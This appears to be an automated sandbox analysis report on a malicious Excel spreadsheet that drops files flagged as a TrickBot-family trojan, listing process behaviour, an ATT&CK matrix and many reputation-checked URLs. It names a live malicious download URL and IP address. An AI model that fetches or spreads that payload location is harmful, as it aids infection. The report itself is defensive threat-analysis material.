Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\sdbybsd.fdsJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BDKsV[1].fbxJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_042E1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,2_2_042E1030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04160456 mov eax, dword ptr fs:[00000030h]2_2_04160456
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0416095E mov eax, dword ptr fs:[00000030h]2_2_0416095E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_042E1030 mov eax, dword ptr fs:[00000030h]2_2_042E1030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_042E1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,2_2_042E1030
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution33Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SecuriteInfo.com.Heur.4923.xls8%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BDKsV[1].fbx2%ReversingLabsWin32.Trojan.Trickpak
C:\Users\user\sdbybsd.fds2%ReversingLabsWin32.Trojan.Trickpak

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.2.rundll32.exe.43c0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
revolet-sa.comNaN%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
http://revolet-sa.com/files/countryyelow.php9%VirustotalBrowse
http://revolet-sa.com/files/countryyelow.php0%Avira URL Cloudsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
revolet-sa.com
192.232.249.186
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://revolet-sa.com/files/countryyelow.phptrue
  • 9%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
    high
    https://login.microsoftonline.com/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
      high
      https://shell.suite.office.com:14433B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
          high
          https://autodiscover-s.outlook.com/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
              high
              https://cdn.entity.3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                    high
                    https://powerlift.acompli.net3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v13B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                      high
                      https://cortana.ai3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                high
                                https://api.aadrm.com/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                      high
                                      https://cr.office.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                            high
                                            https://graph.ppe.windows.net3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                            high
                                                            https://graph.windows.net3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                high
                                                                                                https://api.office.net3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation3B5CB471-C353-487D-9D6C-395FC025FC6E.0.drfalse
                                                                                                              high
